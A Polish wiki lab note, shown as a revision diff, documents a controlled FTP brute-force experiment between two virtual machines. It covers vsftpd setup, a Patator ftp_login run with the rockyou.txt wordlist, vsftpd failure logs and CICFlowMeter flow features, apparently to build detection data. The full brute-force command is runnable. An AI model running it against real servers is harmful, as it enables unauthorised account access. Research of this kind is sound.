Różnice

Różnice między wybraną wersją a wersją aktualną.

--- notatki:ftp_bruteforce [2025/06/19 16:10] – administrator
+++ notatki:ftp_bruteforce [2025/06/19 20:09] (aktualna) – administrator
@@ Linia 1: / Linia 1: @@
-====== FTP Bruteforce ======
+====== Security: FTP Bruteforce (Patator i CICFlowMeter) ======
 ===== Schemat i opis środowiska testowego =====
@@ Linia 5: / Linia 5: @@
 <diagram><svg xmlns="http://www.w3.org/2000/svg" style="background: transparent; background-color: transparent; color-scheme: light dark;" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="263px" height="224px" viewBox="-0.5 -0.5 263 224" content="&lt;mxfile host=&quot;wiki.ostrowski.net.pl&quot; agent=&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0&quot; version=&quot;26.2.15&quot;&gt;&lt;diagram id=&quot;gtjQNWmoT4qQz-VoZcrC&quot; name=&quot;Page-1&quot;&gt;7VhtT9swEP41/bgor7T92DcYEmMIkLZ9QiYxiYcTR86lL/v1OydOk9SBMVHBJqFGrf3c+ey753zXduQt0u2ZJHnyRUSUj1w72o685ch1J06A7wrY1YB/ooFYsqiGnBa4Yb+oBm2NliyiRU8RhODA8j4YiiyjIfQwIqXY9NUeBO/vmpOYGsBNSLiJfmMRJNqtwG7xz5TFSbOzY2tJShplDRQJicSmA3mrkbeQQkA9SrcLylXsmrjU606fkO4PJmkGL1ng1gvWhJfat1siYwoj94Sjgfm9xFGsRo5t6Qetub4+PuyamOw9sVE5IkVCIz1JIOU4dHBYgBSPdCG4kIhkIsPF8wfGeQONXM/3p0GlzMk95VeiYMBEhrIQfaKoNF9TCQzZuDhQuBcAIu0ozDiLlQBEjijRs70dUQJnGR6nyRJ1WvQjVy6l21jlrrWmlKSWG1lrJqEk/C4lYcKqg+vY4WZ0+2T8nT2reBuoSCnIHaroBU0e6IvgBF4937Rp5fvWpAaTTk75mgGiUznem27ZxoEmfJh8zyB/BkDCRyqfod/9oP+I9Dvvyf+JwSKNsM7pqZCQiFhkhK9adC5FmUV7bludC6GCXBH3kwLsdNEmJYh+DtAtg+96uRr/UGMr0LPltiNa7jqTKyoZeqiYq7EsmqlS3iZSAUTCKVPuVhq1d8ql59nBCIhShlpLxxXqMtgWSZNDSTkBtu5bfw0f4/fkw/l/+PDeiA/fqI/nl7efLle3ZvV7pBAm2s9csAyqbYM5PrZlq+87i/3nKMAli0oynfxJoj87ksaaKXFroA8OYWMTdCqbbjAADmHjw70rwBnY+xBzB8BBkwN72weHxOcF7aCT7E90hiKvG8AD26qrZLaKilIqV2taM+sMdIqQFaFwppasbM1zeR5W5+DuXbFhVXoc9rrTmXoZjRElth3YY+84TcYxmoxtNJkG6raYBnvNFZoYV+V4DcQKgl7Nmv47RSt4vyYy/Yj4G7eJwGgT8+vz5dnK/BJ9+xX1sIesroeaCFrFH7C0U1pCLkpVjzYJA3qTk8rZDVabPj9HqBHjoF8izArhuAMlYvL3JQKn7c/bStb5j8Bb/QY=&lt;/diagram&gt;&lt;/mxfile&gt;"><defs/><g><g data-cell-id="0"><g data-cell-id="1"><g data-cell-id="2"><g><path d="M 14 187 L 14 143 L 58.8 143 L 58.8 187 Z" fill="#4495d1" style="fill: light-dark(rgb(68, 149, 209), rgb(61, 131, 183));" stroke="none" pointer-events="all"/><path d="M 35.25 171.3 L 36.02 159.39 L 39.71 159.39 L 42 166.98 L 44.48 159.39 L 48.09 159.39 L 48.74 171.3 L 46.06 171.3 L 45.7 162.24 L 42.85 171.3 L 40.68 171.3 L 38.25 162.44 L 37.79 171.3 Z M 26.88 171.3 L 22.94 159.39 L 25.97 159.39 L 28.57 168.21 L 31.28 159.39 L 34.21 159.39 L 30.09 171.3 Z" fill="#ffffff" style="fill: light-dark(rgb(255, 255, 255), rgb(18, 18, 18));" stroke="none" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe flex-start; justify-content: unsafe center; width: 1px; height: 1px; padding-top: 194px; margin-left: 36px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: nowrap; ">Target<br />10.10.10.1/24</div></div></div></foreignObject><text x="36" y="206" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">Target...</text></switch></g></g></g><g data-cell-id="3"><g><path d="M 204 187 L 204 143 L 248.8 143 L 248.8 187 Z" fill="#4495d1" style="fill: light-dark(rgb(68, 149, 209), rgb(61, 131, 183));" stroke="none" pointer-events="all"/><path d="M 225.25 171.3 L 226.02 159.39 L 229.71 159.39 L 232 166.98 L 234.48 159.39 L 238.09 159.39 L 238.74 171.3 L 236.06 171.3 L 235.7 162.24 L 232.85 171.3 L 230.68 171.3 L 228.25 162.44 L 227.79 171.3 Z M 216.88 171.3 L 212.94 159.39 L 215.97 159.39 L 218.57 168.21 L 221.28 159.39 L 224.21 159.39 L 220.09 171.3 Z" fill="#ffffff" style="fill: light-dark(rgb(255, 255, 255), rgb(18, 18, 18));" stroke="none" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe flex-start; justify-content: unsafe center; width: 1px; height: 1px; padding-top: 194px; margin-left: 226px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: nowrap; ">Attacker<br />10.10.10.2/24</div></div></div></foreignObject><text x="226" y="206" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">Attacke...</text></switch></g></g></g><g data-cell-id="6"><g><path d="M 104 165 L 58.8 165" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="7"><g><path d="M 154 165 L 204 165" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="4"><g><rect x="104" y="140" width="50" height="50" fill="none" stroke="none" pointer-events="all"/><path d="M 107.07 140 C 105.38 140 104 141.37 104 143.05 L 104 186.95 C 104 188.63 105.38 190 107.07 190 L 150.93 190 C 152.62 190 154 188.63 154 186.95 L 154 143.05 C 154 141.37 152.62 140 150.93 140 Z" fill="#fafafa" style="fill: light-dark(rgb(250, 250, 250), rgb(22, 22, 22));" stroke="none" pointer-events="all"/><rect x="104" y="140" width="50" height="50" fill="none" stroke="none" pointer-events="all"/><path d="M 127.38 180.52 L 127.38 176.53 L 116.78 176.53 L 116.78 173.39 L 107.75 178.71 L 116.78 183.96 L 116.78 180.52 Z M 132.32 161.46 L 132.32 157.48 L 121.73 157.48 L 121.73 154.33 L 112.7 159.66 L 121.73 164.9 L 121.73 161.46 Z M 126.38 171.06 L 126.38 167.08 L 136.98 167.08 L 136.98 163.93 L 146 169.26 L 136.98 174.51 L 136.98 171.06 Z M 130.96 152.32 L 130.96 148.34 L 141.55 148.34 L 141.55 145.2 L 150.58 150.52 L 141.55 155.77 L 141.55 152.32 Z M 107.07 140 C 105.38 140 104 141.37 104 143.05 L 104 186.95 C 104 188.63 105.38 190 107.07 190 L 150.93 190 C 152.62 190 154 188.63 154 186.95 L 154 143.05 C 154 141.37 152.62 140 150.93 140 Z M 107.07 141.38 L 150.93 141.38 C 151.88 141.38 152.62 142.11 152.62 143.05 L 152.62 186.95 C 152.62 187.89 151.88 188.62 150.93 188.62 L 107.07 188.62 C 106.12 188.62 105.38 187.89 105.38 186.95 L 105.38 143.05 C 105.38 142.11 106.12 141.38 107.07 141.38 Z" fill="#005073" style="fill: light-dark(rgb(0, 80, 115), rgb(124, 193, 223));" stroke="none" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe flex-start; justify-content: unsafe center; width: 1px; height: 1px; padding-top: 197px; margin-left: 129px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: nowrap; ">INT-NET</div></div></div></foreignObject><text x="129" y="209" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">INT-NET</text></switch></g></g></g><g data-cell-id="8"><g><path d="M 135 76 L 58.8 144.78" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="9"><g><path d="M 135 76 L 204 143.19" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="5"><g><path d="M 99 20 C 75 20 69 40 88.2 44 C 69 52.8 90.6 72 106.2 64 C 117 80 153 80 165 64 C 189 64 189 48 174 40 C 189 24 165 8 144 16 C 129 4 105 4 99 20 Z" fill="#ffffff" style="fill: light-dark(#ffffff, var(--ge-dark-color, #121212)); stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke="#000000" stroke-miterlimit="10" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe center; justify-content: unsafe center; width: 118px; height: 1px; padding-top: 40px; margin-left: 70px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: normal; word-wrap: normal; ">BRIDGE<br />TO INTERNET</div></div></div></foreignObject><text x="129" y="44" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">BRIDGE...</text></switch></g></g></g></g></g></g></svg></diagram>
+Opis:
+Środowisko składa się z dwóch maszyn wirtualnych (VM) działających na Ubuntu Server:
+  * Maszyna atakująca: uruchomiony program Patator do ataku brute-force na usługę FTP oraz tcpdump do przechwytywania ruchu.
+  * Maszyna ofiara: zainstalowany i skonfigurowany serwer FTP (vsftpd).
+  * Sieć: maszyny podłączone do tego samego switcha wirtualnego w Hyper-V.
+Każda z Maszyn ma dysk o rozmiarze 8GB ([[https://documentation.ubuntu.com/server/reference/installation/system-requirements/|Wymagania minimalne ubuntu]] mówią o minimalnie 5GB). Dyski są w formacie vhdx, wykorzystywanym przez hyper-v.
+Dyski maszyn można pobrać z linka poniżej:\\
+https://1drv.ms/f/c/9dd28f74d9c48b45/ElEe6P0-WYpOmB3YukiRtzwBVGtNNW8QbW3jmy5V-9PWPQ?e=RSLSO4\\
+Hasło do linka: ''Ostrowski19062025''
+===== Oprogramowanie wykorzystane do wykonania eksperymentu =====
+^ Komponent                             ^ Wersja                     ^ Nazwa          ^
+| System operacyjny maszyn wirtualnych  | 24.04.2 LTS                | Ubuntu Server  |
+| Hypervisor                            | Wersja: 10.0.26100.1882    | Hyper-V        |
+| Serwer FTP                            | 3.0.5                      | VSFTPD         |
+| Narzędzie ataku                       | 1.0                        | Patator        |
+| Przechwytywanie ruchu                 | 4.99.1                     | tcpdump        |
+| Analiza Ruchu                         | 0.4.2                      | CICFlowMeter   |
+| Słownik do ataku                      | ok. 14 MB, 14344392 haseł  | rockyou.txt    |
+====== Instalacja i konfiguracja ======
+===== Maszyna ofiara =====
+<code bash>
+administrator@target:~$ sudo apt update -y
+[sudo] password for administrator:
+Hit:1 http://security.ubuntu.com/ubuntu noble-security InRelease
+Hit:2 http://archive.ubuntu.com/ubuntu noble InRelease
+Hit:3 http://archive.ubuntu.com/ubuntu noble-updates InRelease
+Hit:4 http://archive.ubuntu.com/ubuntu noble-backports InRelease
+Reading package lists... Done
+Building dependency tree... Done
+Reading state information... Done
+packages can be upgraded. Run 'apt list --upgradable' to see them.
+administrator@target:~$ sudo apt install vsftpd -y
+[LOGI Z INSTALACJI]
+</code>
+Zmiany w pliku konfiguracyjnym ''/etc/vsftpd.conf'':\\
+<code bash>
+anonymous_enable=NO
+local_enable=YES
+write_enable=YES
+listen=YES
+listen_ipv6=NO
+</code>
+Tworzenie użytkownika FTP z hasłem ''a7s8d6a8s7d6a8s7d68s7'':\\
+<code bash>
+administrator@target:~$ sudo adduser ftpuser
+info: Adding user `ftpuser' ...
+info: Selecting UID/GID from range 1000 to 59999 ...
+info: Adding new group `ftpuser' (1001) ...
+info: Adding new user `ftpuser' (1001) with group `ftpuser (1001)' ...
+info: Creating home directory `/home/ftpuser' ...
+info: Copying files from `/etc/skel' ...
+New password:
+Retype new password:
+passwd: password updated successfully
+Changing the user information for ftpuser
+Enter the new value, or press ENTER for the default
+        Full Name []:
+        Room Number []:
+        Work Phone []:
+        Home Phone []:
+        Other []:
+Is the information correct? [Y/n] y
+info: Adding new user `ftpuser' to supplemental / extra groups `users' ...
+info: Adding user `ftpuser' to group `users' ...
+administrator@target:~$
+</code>
+Restart usługi:\\
+<code bash>
+administrator@target:~$ sudo systemctl restart vsftpd
+administrator@target:~$ sudo systemctl status vsftpd.service
+● vsftpd.service - vsftpd FTP server
+     Loaded: loaded (/usr/lib/systemd/system/vsftpd.service; enabled; preset: e>
+     Active: active (running) since Thu 2025-06-19 15:00:47 UTC; 6s ago
+    Process: 4065 ExecStartPre=/bin/mkdir -p /var/run/vsftpd/empty (code=exited>
+   Main PID: 4068 (vsftpd)
+      Tasks: 1 (limit: 4602)
+     Memory: 704.0K (peak: 1.5M)
+        CPU: 7ms
+     CGroup: /system.slice/vsftpd.service
+             └─4068 /usr/sbin/vsftpd /etc/vsftpd.conf
+Jun 19 15:00:47 target systemd[1]: Starting vsftpd.service - vsftpd FTP server.>
+Jun 19 15:00:47 target systemd[1]: Started vsftpd.service - vsftpd FTP server.
+administrator@target:~$
+</code>
+===== Maszyna atakująca =====
+Instalacja Narzędzi:\\
+<code bash>
+administrator@attacker:~$ sudo apt update -y
+[sudo] password for administrator:
+Hit:1 http://security.ubuntu.com/ubuntu noble-security InRelease
+Hit:2 http://archive.ubuntu.com/ubuntu noble InRelease
+Hit:3 http://archive.ubuntu.com/ubuntu noble-updates InRelease
+Hit:4 http://archive.ubuntu.com/ubuntu noble-backports InRelease
+Reading package lists... Done
+Building dependency tree... Done
+Reading state information... Done
+packages can be upgraded. Run 'apt list --upgradable' to see them.
+administrator@attacker:~$ sudo apt install git python3-pip tcpdump -y
+[TUTAJ LOGI Z INSTALACJI]
+</code>
+Przed instalacją patatora dodano repozytoria kali-linux do ubuntu.\\
+Instalacja Patatora:\\
+<code bash>
+administrator@attacker:~$ sudo apt install patator -y
+[TUTAJ LOGI Z INSTALACJI]
+</code>
+Instalacja CICFlowMeter w wersji Python:\\
+<code bash>
+administrator@attacker:~/patator$ pip install cicflowmeter
+[TUTAJ LOGI Z INSTALACJI]
+</code>
+Pobranie słownika do ataku:\\
+<code bash>
+administrator@attacker:~$ wget https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
+--2025-06-19 15:19:13--  https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
+Resolving github.com (github.com)... 140.82.121.3
+Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+HTTP request sent, awaiting response... 302 Found
+Location: https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz [following]
+--2025-06-19 15:19:14--  https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
+Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...
+Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 53291283 (51M) [application/octet-stream]
+Saving to: ‘rockyou.txt.tar.gz’
+rockyou.txt.tar.gz                                  100%[=================================================================================================================>]  50.82M  1.56MB/s    in 32s
+-06-19 15:19:48 (1.59 MB/s) - ‘rockyou.txt.tar.gz’ saved [53291283/53291283]
+administrator@attacker:~$ tar -xzf rockyou.txt.tar.gz
+administrator@attacker:~$ wc -l rockyou.txt #liczba haseł około 14 milionów
+14344391 rockyou.txt
+administrator@attacker:~$ head rockyou.txt #pierwsze wpisy w pliku
+123456789
+password
+iloveyou
+princess
+1234567
+rockyou
+12345678
+abc123
+</code>
+====== Test Komunikacji ======
+Ping:\\
+<code bash>
+administrator@target:~$ ping 10.10.10.2
+PING 10.10.10.2 (10.10.10.2) 56(84) bytes of data.
+bytes from 10.10.10.2: icmp_seq=1 ttl=64 time=0.180 ms
+bytes from 10.10.10.2: icmp_seq=2 ttl=64 time=0.229 ms
+bytes from 10.10.10.2: icmp_seq=3 ttl=64 time=0.269 ms
+bytes from 10.10.10.2: icmp_seq=4 ttl=64 time=0.286 ms
+bytes from 10.10.10.2: icmp_seq=5 ttl=64 time=0.266 ms
+bytes from 10.10.10.2: icmp_seq=6 ttl=64 time=0.293 ms
+bytes from 10.10.10.2: icmp_seq=7 ttl=64 time=0.284 ms
+^C
+--- 10.10.10.2 ping statistics ---
+packets transmitted, 7 received, 0% packet loss, time 6182ms
+rtt min/avg/max/mdev = 0.180/0.258/0.293/0.037 ms
+administrator@target:~$
+</code>
+FTP:\\
+<code bash>
+administrator@attacker:~$ ftp 10.10.10.1
+Connected to 10.10.10.1.
+(vsFTPd 3.0.5)
+Name (10.10.10.1:administrator): ftpuser
+Please specify the password.
+Password:
+Login successful.
+Remote system type is UNIX.
+Using binary mode to transfer files.
+ftp> dir
+Entering Extended Passive Mode (|||8296|)
+Here comes the directory listing.
+Directory send OK.
+ftp>
+</code>
+====== Przeprowadzenie Ataku ======
+W jednej sesji terminala uruchomienie przechwytywania:\\
+<code bash>
+sudo tcpdump -i eth1 port 21 -w ftp_attack.pcap
+</code>
+W drugiej sesji terminala atak Patator:\\
+<code bash>
+administrator@attacker:~$ patator ftp_login host=10.10.10.1 user=ftpuser password=FILE0 0=rockyou.txt -x ignore:mesg='Login incorrect' --rate-limit=50
+:39:45 patator    INFO - Starting Patator 1.0 (https://github.com/lanjelot/patator) with python-3.12.3 at 2025-06-19 15:39 UTC
+:39:45 patator    INFO -
+:39:45 patator    INFO - code  size    time | candidate                          |   num | mesg
+:39:45 patator    INFO - -----------------------------------------------------------------------------
+:40:38 patator    INFO - 530   16     2.772 | 123456                             |     1 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.778 | 12345                              |     2 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.785 | 123456789                          |     3 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.770 | password                           |     4 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.770 | iloveyou                           |     5 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.786 | princess                           |     6 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.776 | 1234567                            |     7 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.773 | rockyou                            |     8 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.784 | 12345678                           |     9 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.778 | abc123                             |    10 | Login incorrect.
+[TUTAJ CIĄGNIE SIĘ DALEJ]
+</code>
+  * ''--rate-limit=50'': ogranicza tempo ataku do 50 prób/sekundę (by nie przytłoczyć serwera)
+  * ''rockyou.txt'': używa ogólnodostępnego słownika
+<WRAP center round important 60%>
+W tym przypadku atak się nie powiedzie, ponieważ utworzone hasło nie znajduje się w rockyou.txt – i o to właśnie chodzi: chodzi o symulację nieudanego ataku, który będzie wyraźnie widoczny w ruchu.
+</WRAP>
+====== Efekty Ataku ======
+===== Po stronie atakującej =====
+  * Konsola Patatora wykaże tysiące nieudanych prób.
+  * Hasło nie zostanie złamane.
+  * Cały ruch jest zapisany w ftp_attack.pcap.
+===== Po stronie serwera FTP =====
+Fragment logu z /var/log/vsftpd.log:
+<code yaml>
+administrator@target:~$ sudo tail -f /var/log/vsftpd.log
+[sudo] password for administrator:
+Thu Jun 19 15:27:39 2025 [pid 6752] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:27:50 2025 [pid 6751] [ftpuser] OK LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7001] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7003] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7005] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7007] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7009] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7011] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7013] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7015] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7017] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7019] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7000] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7006] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7002] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7008] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7004] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7014] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7012] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7010] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7016] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7018] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7006] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7000] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7008] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7002] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7012] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7014] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7004] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7010] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7016] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7018] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7006] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7008] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7002] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7000] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7012] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7010] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7004] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7014] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7018] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7016] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+[TUTAJ CIĄGNIE SIĘ DALEJ]
+</code>
+Pełna wersja logów do pobrania {{:notatki:vsftpd_copy.log}}
+<WRAP center round info 60%>
+Po 765 próbach (~122min) zatrzymano eksperyment
+</WRAP>
+====== Użycie CICFlowMeter (Python) i ekstrakcja cech ======
+<code bash>
+administrator@attacker:~$ cicflowmeter -f ftp_attack.pcap -c ftp_attack.csv
+reading from file ftp_attack.pcap, link-type EN10MB (Ethernet), snapshot length 262144
+administrator@attacker:~$ ls -lah
+total 186M
+drwxr-x--- 7 administrator administrator 4.0K Jun 19 17:16 .
+drwxr-xr-x 3 root          root          4.0K Jun 19 15:07 ..
+-rw------- 1 administrator administrator 1.1K Jun 19 15:25 .bash_history
+-rw-r--r-- 1 administrator administrator  220 Mar 31  2024 .bash_logout
+-rw-r--r-- 1 administrator administrator 3.7K Mar 31  2024 .bashrc
+drwx------ 4 administrator administrator 4.0K Jun 19 17:15 .cache
+drwx------ 2 administrator administrator 4.0K Jun 19 17:15 .config
+-rw-rw-r-- 1 administrator administrator 263K Jun 19 17:16 ftp_attack.csv
+-rw-r--r-- 1 tcpdump       tcpdump       750K Jun 19 17:09 ftp_attack.pcap
+drwxrwxr-x 7 administrator administrator 4.0K Jun 19 15:13 patator
+-rw-r--r-- 1 administrator administrator  807 Mar 31  2024 .profile
+-rw------- 1 administrator administrator 134M Sep 23  2015 rockyou.txt
+-rw-rw-r-- 1 administrator administrator  51M Jun 19 15:19 rockyou.txt.tar.gz
+drwx------ 2 administrator administrator 4.0K Jun 19 15:07 .ssh
+-rw-r--r-- 1 administrator administrator    0 Jun 19 15:08 .sudo_as_admin_successful
+drwxrwxr-x 6 administrator administrator 4.0K Jun 19 15:16 venv_patator
+-rw-rw-r-- 1 administrator administrator  215 Jun 19 15:19 .wget-hsts
+-rw------- 1 administrator administrator  108 Jun 19 15:25 .Xauthority
+administrator@attacker:~$ cat ftp_attack.csv
+src_ip,dst_ip,src_port,dst_port,protocol,timestamp,flow_duration,flow_byts_s,flow_pkts_s,fwd_pkts_s,bwd_pkts_s,tot_fwd_pkts,tot_bwd_pkts,totlen_fwd_pkts,totlen_bwd_pkts,fwd_pkt_len_max,fwd_pkt_len_min,fwd_pkt_len_mean,fwd_pkt_len_std,bwd_pkt_len_max,bwd_pkt_len_min,bwd_pkt_len_mean,bwd_pkt_len_std,pkt_len_max,pkt_len_min,pkt_len_mean,pkt_len_std,pkt_len_var,fwd_header_len,bwd_header_len,fwd_seg_size_min,fwd_act_data_pkts,flow_iat_mean,flow_iat_max,flow_iat_min,flow_iat_std,fwd_iat_tot,fwd_iat_max,fwd_iat_min,fwd_iat_mean,fwd_iat_std,bwd_iat_tot,bwd_iat_max,bwd_iat_min,bwd_iat_mean,bwd_iat_std,fwd_psh_flags,bwd_psh_flags,fwd_urg_flags,bwd_urg_flags,fin_flag_cnt,syn_flag_cnt,rst_flag_cnt,psh_flag_cnt,ack_flag_cnt,urg_flag_cnt,ece_flag_cnt,down_up_ratio,pkt_size_avg,init_fwd_win_byts,init_bwd_win_byts,active_max,active_min,active_mean,active_std,idle_max,idle_min,idle_mean,idle_std,fwd_byts_b_avg,fwd_pkts_b_avg,bwd_byts_b_avg,bwd_pkts_b_avg,fwd_blk_rate_avg,bwd_blk_rate_avg,fwd_seg_size_avg,bwd_seg_size_avg,cwr_flag_count,subflow_fwd_pkts,subflow_bwd_pkts,subflow_fwd_byts,subflow_bwd_byts
+.10.10.1,10.10.10.2,21,37852,6,2025-06-19 15:41:31,103.324816,12.12680601337824,0.1645296905246848,0.09678217089687341,0.06774751962781139,10,7,736,517,100,54,73.6,15.226293048539425,81,66,73.85714285714286,6.854166020511517,100,54,73.70588235294117,12.479464099930464,155.73702422145328,200,140,20,4,6.457801,49.981098,0.0,16.465319560282826,103.324816,50.001816,0.0,11.480535111111113,20.609759023049122,103.284029,49.981098,4e-05,17.21400483333333,23.19276500435293,4,3,0,0,3,0,2,7,15,0,0,0.7,73.70588235294117,510,502,0,0,0,0,0,0,0,0,0,0,0,0,0,0,73.6,73.85714285714286,0,10,7,736,517
+[I TAK DALEJ]
+</code>
+Wynik przechwytywania do pobrania {{:notatki:ftp_attack.pcap}}
